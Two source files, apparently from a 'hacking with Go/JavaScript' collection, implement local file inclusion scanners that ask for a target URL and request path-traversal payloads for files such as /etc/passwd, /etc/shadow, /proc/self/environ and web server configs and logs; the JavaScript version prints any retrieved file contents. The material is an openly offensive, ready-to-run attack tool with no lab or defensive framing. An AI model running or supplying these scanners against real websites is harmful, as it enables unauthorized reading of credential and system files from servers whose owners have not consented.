File: hacking_with_go/lfi.go
package main

import (
	"bufio"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"strings"
	"sync"
)

// PayloadGenerator generates LFI payloads
type PayloadGenerator interface {
	Generate() []string
}

// DefaultPayloadGenerator generates default LFI payloads
type DefaultPayloadGenerator struct{}

// Generate generates default LFI payloads
func (d DefaultPayloadGenerator) Generate() []string {
	return []string{
		"../../../../../../../../../../../../../../etc/passwd",
		"../../../../../../../../../../../../../../etc/hosts",
		"../../../../../../../../../../../../../../etc/shadow",
		"../../../../../../../../../../../../../../proc/self/environ",
		"../../../../../../../../../../../../../../var/log/auth.log",
		"../../../../../../../../../../../../../../windows/win.ini",
		"../../../../../../../../../../../../../../boot.ini",
		"../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts",
		"../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf",
		"../../../../../../../../../../../../../../var/log/apache/access.log",
		"../../../../../../../../../../../../../../var/log/apache/error.log",
		"../../../../../../../../../../../../../../var/log/httpd/access_log",
		"../../../../../../../../../../../../../../var/log/httpd/error_log",
		"../../../../../../../../../../../../../../etc/httpd/logs/access_log",
		"../../../../../../../../../../../../../../etc/httpd/logs/error_log",
		// Add more payloads here...
	}
}

func main() {
	// Prompt the user to enter the target website URL
	fmt.Print("Enter your target website URL: ")
	scanner := bufio.NewScanner(os.Stdin)
	scanner.Scan()
	targetURL := scanner.Text()

	// Initialize payload generator
	payloadGenerator := DefaultPayloadGenerator{}

	// Channel to communicate results
	results := make(chan string)

	// WaitGroup to wait for all workers to finish
	var wg sync.WaitGroup

	// Number of concurrent workers
	numWorkers := 10

	// Vulnerability status flag
	isVulnerable := false

	// Start the workers
	for i := 0; i < numWorkers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for _, payload := range payloadGenerator.Generate() {
				// Construct the URL with the payload
				testURL := fmt.Sprintf("%s/%s", targetURL, payload)

				// Perform a GET request to the URL
				resp, err := http.Get(testURL)
				if err != nil {
					fmt.Printf("Error occurred for %s: %v\n", testURL, err)
					continue
				}
				defer resp.Body.Close()

				// Read response body
				bodyBytes, err := ioutil.ReadAll(resp.Body)
				if err != nil {
					fmt.Printf("Error reading response body for %s: %v\n", testURL, err)
					continue
				}
				bodyString := string(bodyBytes)

				// Check if the response status code indicates success (200)
				if resp.StatusCode == http.StatusOK {
					// Analyze response for potential vulnerability indicators
					if strings.Contains(bodyString, "root:") {
						isVulnerable = true
						results <- fmt.Sprintf("Vulnerable URL found: %s", testURL)
					}
				}
			}
		}()
	}

	// Close the results channel once all workers are done
	go func() {
		wg.Wait()
		close(results)
	}()

	// Listen for results
	for result := range results {
		fmt.Println(result)
	}

	// Display confirmation message based on vulnerability status
	if isVulnerable {
		fmt.Println("The target is vulnerable to LFI.")
	} else {
		fmt.Println("The target is not vulnerable to LFI.")
	}

	fmt.Println("Finished testing.")
}

File: hacking_with_javascript/lfi.js
const http = require('http');
const readline = require('readline');

// Function to make a GET request to the target URL
function getRequest(url) {
    return new Promise((resolve, reject) => {
        http.get(url, (res) => {
            let data = '';
            res.on('data', (chunk) => {
                data += chunk;
            });
            res.on('end', () => {
                resolve(data);
            });
        }).on('error', (error) => {
            reject(error);
        });
    });
}

// Function to test LFI vulnerability
async function testLFI(targetUrl) {
    const pathsToTest = [
        '../../../../../../../../../../etc/passwd',
        '../../../../../../../../../../etc/hosts',
        '../../../../../../../../../../etc/shadow',
        '../../../../../../../../../../etc/apache2/apache2.conf',
        '../../../../../../../../../../etc/nginx/nginx.conf',
        '../../../../../../../../../../etc/mysql/my.cnf',
        '../../../../../../../../../../var/log/apache2/access.log',
        '../../../../../../../../../../var/log/apache2/error.log',
        '../../../../../../../../../../var/log/nginx/access.log',
        '../../../../../../../../../../var/log/nginx/error.log',
        '../../../../../../../../../../var/log/mysql/error.log'
    ];
    
    console.log('\x1b[33m', 'Testing for LFI vulnerability...');

    for (const path of pathsToTest) {
        const url = `${targetUrl}${path}`;
        console.log('\x1b[36m', `Testing ${url}...`);
        try {
            const data = await getRequest(url);
            console.log('\x1b[32m', `Success: ${url} is accessible.`);
            console.log('\x1b[33m', `Contents: \n${data}`);
        } catch (error) {
            console.log('\x1b[31m', `Failed: ${url} is not accessible.`);
        }
    }
}

// Function to prompt user for target website URL
function promptUser() {
    const rl = readline.createInterface({
        input: process.stdin,
        output: process.stdout
    });

    rl.question('Enter your target website URL: ', async (answer) => {
        const targetUrl = answer.trim();
        console.log('\x1b[36m', `Testing target: ${targetUrl}`);
        await testLFI(targetUrl);
        rl.close();
    });
}

// Start the program
promptUser();
